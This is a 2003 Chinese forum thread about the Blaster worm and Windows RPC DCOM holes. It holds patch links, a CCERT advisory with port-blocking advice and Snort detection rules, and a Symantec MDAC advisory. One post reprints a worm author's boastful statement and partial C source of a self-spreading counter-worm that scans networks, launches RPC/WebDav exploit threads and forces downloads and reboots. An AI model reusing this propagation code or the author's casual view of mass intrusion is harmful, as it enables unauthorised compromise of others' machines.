主题:  【病毒警告】Worm.SdBotRPC&M$又有安全漏洞

brahma

职务:版主
等级:5
金币:15.1
发贴:1762
#12003/8/13 11:46:34
攻击RPC服务,造成系统强行重新启动

症状如图

由于此病毒传播较快,n多人感染 暂时置定

跟踪报道:利用RPC漏洞的病毒可能不止一个,已经有数以百计(甚至上千用户)用户感染,各个反病毒厂商正在努力斗争中……

请大家立即安装补丁程序或关闭DCOM组件(看 www.antivirus-china.org.cn/content/rpc.htm

图片如下:



解决:
Microsoft Security Bulletin MS03-026
Buffer Overrun In RPC Interface Could Allow Code Execution (823980)
www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-026.asp

请按照操作系统版本下载相应的补丁,如果已经中毒,请杀毒
金山毒霸组已经推出专杀,看 www.duba.net/download/3/91.shtml

Symantec分析报告:
securityresponse.symantec.com/avcenter/venc/data/backdoor.irc.cirebot.html

建议使用 windowsupdate.microsoft.com 下载全部关键更新并升级而不单独下载补丁,这样可以对一次修复很多漏洞
希望斑竹置定

编辑历史:[这消息被brahma编辑过(编辑时间2003-08-29 13:47:13)]


brahma

职务:版主
等级:5
金币:15.1
发贴:1762
#22003/8/13 11:47:18
7月16日波兰的一个安全组织LSD公布了一个Windows操作系统的一个安全漏洞,这个漏洞号称迄今为止window系统中发现的最严重的一个系统漏洞
(漏洞的详情参见http://www.ccert.edu.cn/advisories/all.php?ROWID=48)
随后各安全组织对该漏洞展开了相关的研究,在研究的过程中国内的安全组织又发现了与之相
关的两个同类型的漏洞,并上报了微软,但是目前厂商还没有提供相关的补丁程序。因此到目
前为止针对window rpc系列实际上存在三个类似的漏洞,它们分别是:

1、Microsoft RPC接口远程任意代码可执行漏洞

漏洞描述:
Remote Procedure Call(RPC)是Windows操作系统使用的一种远程过程调用协议,RPC协议提供
一种进程间的交互通信机制,它允许本地机器上的程序进程无缝的在远程系统中运行代码。
该协议的前身是OSF RPC协议,但是增加了微软自己的一些扩展。

最近发现部分RPC在使用TCP/IP协议处理信息交换时不正确的处理畸形的消息导致存在一个
安全漏洞。该漏洞影响使用RPC的DCOM接口,这个接口用来处理由客户端机器发送给服务器
的DCOM对象激活请求(如UNC路径)。如果攻击者成功利用了该漏洞将获得本地系统权限,他
将可以在系统上运行任意命令,如安装程序、查看或更改、删除数据或者是建立系统管理员
权限的帐户等。

要利用这个漏洞,攻击者需要发送特殊形式的请求到远程机器上的135端口.

2、Microsoft DCOM RPC接口拒绝服务及权限提升漏洞
漏洞描述:
Remote Procedure Call(RPC)是Windows操作系统使用的一种远程过程调用协议,RPC协议提供
一种进程间的交互通信机制,它允许本地机器上的程序进程无缝的在远程系统中运行代码。
该协议的前身是OSF RPC协议,但是增加了微软自己的一些扩展。

最近发现MS RPC在处理畸形消息时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻
击,在RPC服务崩溃后,可用来权限提升攻击。攻击者发送畸形消息给
DCOM __RemoteGetClassObject接口,RCP服务就会崩溃,所有依靠RPC服务的应用程序和服务
就会变的不正常。

如果攻击者拥有合法帐户,在RPC服务崩溃后他还可以劫持管道和135端口进行权限提升攻击。

3、window RPC接口未知漏洞
漏洞描述:
由于该漏洞影响面太大而厂商又未推出相应的补丁程序,因此目前并未公布该漏洞的详细技术
细节,但是发现该漏洞的组织中联绿盟信息技术(北京)有限公司在报告中有提到如下警告:
该漏洞可以使入侵者轻而易举的进入Windows 2000、Windows XP、Windows2003 Server系统。
攻击者可以通过该漏洞取得系统的控制权,完全控制被入侵的系统,窃取文件,破坏资料。
因为该漏洞和以往发现的安全漏洞不同,不仅影响作为服务器的Windows系统,同样也会影响个
人电脑,所以潜在的受害者数量非常多。

漏洞危害:
7月23号网络上发布了DCOM RPC接口拒绝服务攻击的程序代码,7月26日window RPC接口远程缓
冲溢出的攻击程序代码被公布,这样就导致即便是一个对该漏洞技术细节毫不了解的人也能使
用这些代码去攻击网络上的其他机器以达到拒绝服务攻击的目的或是获得相应的系统权限。目
前公布的代码是对系统版本有针对性的,但是通用于各系统版本中的攻击代码正在测试中,相
信在稍后的几天内便会被公布出来,一旦这种攻击代码被公布出来,只需要很小的技术上的改
造就可以改编成蠕虫,如果利用这个漏洞蠕虫被发布出来,它的威力将远远超过codered和
slammer,可能会给整个互联网络带来致命的打击。

解决办法:
针对以上漏洞,CCERT建议用户对您的机器采取以下措施:
1、下载安装相应的补丁程序:
针对第一个漏洞微软已经发布了相应的安全公告与补丁程序,你可以到我们的网站下载:
www.ccert.edu.cn/advisories/all.php?ROWID=48

针对其他两个漏洞,微软目前还没有发布相应的补丁程序,我们建议您使用window自动update
功能,随时关注厂商的动态,你也可以关注我们的主页http://www.ccert.edu.cn
我们会在第一时间提供相应的补丁程序下载

2、使用防火墙关闭所有不必要的端口,根据我们现在掌握的信息,这些漏洞不仅仅影响135端口,
它影响到大部分调用DCOM函数的服务端口,因此CCERT建议用户使用网络或是个人防火墙过滤以
下端口:
135/TCP epmap
135/UDP epmap
139/TCP netbios-ssn
139/UDP netbios-ssn
445/TCP microsoft-ds
445/UDP microsoft-ds
593/TCP http-rpc-epmap
593/UDP http-rpc-epmap

3、使用IDS系统检测来自于网络上的攻击,IDS规则如下:
alert tcp $EXTERNAL_NET any -> $HOME_NET 445
(msg:"NETBIOS SMB DCERPC ISystemActivator bind attempt"; flow:to_server,established;
content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56;
within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12;
content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1;
byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|";
distance:29; within:16; reference:cve,CAN-2003-0352asstype:
attempted-admin; sid:2193; rev:1

alert tcp $EXTERNAL_NET any -> $HOME_NET 135
(msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established;
content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:
1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|";
distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin;
sid:2192; rev:1

注意:
1、针对第一个漏洞的补丁并没有包括在window 2000 sp4中,你需要下载单独的热修补补丁。
2、由于rpc服务已经被镶嵌到window的内核当中,因此我们不建议您使用关闭rpc服务的方
法来防止该漏洞被利用,因为关闭rpc服务可能会导致您的系统出现许多未知的错误
3、当您的系统突然弹出了svchost.exe出现异常错误的对话框或者是135端口突然被关闭,很
可能表示你已经受到了这类攻击,请尽快采取相应的措施



88888

职务:普通成员
等级:1
金币:0.0
发贴:4
#32003/8/14 16:24:37
你早点说就好了,我们这80%感染了。昨晚中央电视台已经报道了。



IBM里的拖鞋

职务:普通成员
等级:4
金币:10.0
发贴:2033
#42003/8/16 23:35:04
我的11号晚上中的,12号就清楚了,感谢喇嘛!!!

我们新乡有好多电脑都中了这个“冲击波”病毒~~~

可发了修电脑的了!

其实感染了,不恐怖,我感染了两次,清楚了两次!


QQ:16408396

大鸟

职务:普通成员
等级:2
金币:1.0
发贴:445
#52003/8/22 10:01:21
昨天第一天上班就遭遇“冲击波”,机器被隔离,无法上网!
结果整整半天无所事事!
最后准时下班,感觉有好长时间没有准时下班过了! :p

编辑历史:[这消息被大鸟编辑过(编辑时间2003-08-22 10:04:41)]


Syawn

职务:普通成员
等级:5
金币:10.0
发贴:2930
#62003/8/23 10:43:51
不知道学校的机器中招没



pigeon

职务:普通成员
等级:1
金币:0.0
发贴:46
#72003/8/23 15:01:12
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见

www.donews.com/donews/article/5/50423.html

8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = '=========== I love my wife & baby :-)~~~ Welcome Chian~~~
Notice: 2004 will remove myself:-)~~ sorry zhongli~~~=========== wins';

偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!

======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到:-)~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom & WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k & xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~

4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon(TM) 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 :-)~~~

5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~


//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了

//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);


if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}

if ( nLanguageID == -1)
return FALSE;

char szServicePack[] = 'RpcServicePack.exe';

// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}

char szExec[180];
sprintf(szExec, '%s -n -o -z -q', szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}

return TRUE;
}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
:-)~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;


u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);

Sleep(2);
}

//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);

}

Sleep(60000);
}


//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

//杀蠕虫
KillMsblast();

//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}

srand( GetTickCount() );

memset(pPingBuffer, `\xAA`, sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~


//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口

//打补丁
DoServicePackFunction();

//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); //等待接收线程中的全局 rand bind port


u_long ulIP;
for(;;-){ //估算了一下,普通机器2小时一循环


//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);


//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);


//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);


//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~


KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读,增加几个补充说明

1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。

3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认



brahma

职务:版主
等级:5
金币:15.1
发贴:1762
#82003/8/29 13:46:06
M$又有安全漏洞,请使用MDAC(SQL Server,Office等都有这个组件)的朋友注意
Microsoft Data Access Components ODBC Buffer Overflow Vulnerability
Risk
High

Date Discovered
08-20-2003

Description

A buffer overflow vulnerability exists in Microsoft Data Access Components that may allow an attacker to run arbitrary code on a client machine. This vulnerability is exposed when a client or a SQL Server implementing the SQL-DMO library, sends a broadcast request for Microsoft SQL Servers on a network. In response an attacker could send malicious data to the querying system, causing a buffer overflow.

This vulnerability could allow an attacker to gain access to confidential data and compromise the system.

Platforms Affected
Microsoft Office 2000 SP2
Microsoft Office 2000 SR1
Microsoft SQL Server 7.0 SP2
Microsoft SQL Server 7.0 SP2 alpha
Microsoft SQL Server 7.0 SP3
Microsoft SQL Server 7.0 SP3 alpha
Microsoft SQL Server 2000
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 Desktop Engine
Microsoft Visual Studio .NET Academic Edition
Microsoft Visual Studio .NET Enterprise Architect Edition
Microsoft Visual Studio .NET Enterprise Developer Edition
Microsoft Visual Studio .NET Professional Edition
Microsoft Visual Studio .NET Trial Edition
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server Japanese Edition
Microsoft Windows 2000 Terminal Services
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services SP2
Microsoft Windows XP
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP Home
Microsoft Windows XP Professional

Components Affected
Microsoft MDAC 2.5 SP2
Microsoft MDAC 2.5 SP1
Microsoft MDAC 2.5 RTM
Microsoft MDAC 2.5
Microsoft MDAC 2.6 SP2
Microsoft MDAC 2.6 SP1
Microsoft MDAC 2.6 RTM
Microsoft MDAC 2.6
Microsoft MDAC 2.7 RTM Refresh
Microsoft MDAC 2.7

Recommendations
Block external access at the network boundary, unless service is required by external parties.
Restricting access to the network may prevent an attacker from listening to SQL requests from clients. If possible ensure that trusted sources have access to the internal network.

Microsoft has released a patch in order to address this issue.


Microsoft MDAC 2.5 SP2:

Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.5 SP1:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.5 RTM:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.5:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.6 SP2:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.6 SP1:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.6 RTM:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.6:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.7 RTM Refresh:
Microsoft Patch Q823718
www.microsoft.com/downloads/...&displaylang=en

Microsoft MDAC 2.7:
References
Source: AppSecInc Security Alert: Buffer Overflow in UDP broadcasts for Microsoft SQL Se
URL: msg://bugtraq/008101c36816$59de0e80$f501a8c0@nycapt35k.com

Source: Microsoft Security Bulletin MS03-033
URL: www.microsoft.com/technet/tr...in/MS03-033.asp

Credits
The discovery of this vulnerability has been credited to "Aaron C. Newman"





--------------------------------------------------------------------------------

Copyright (c) 2003 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Security Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from symsecurity@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Symantec, Symantec products, Symantec Security Response, and SymSecurity are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners.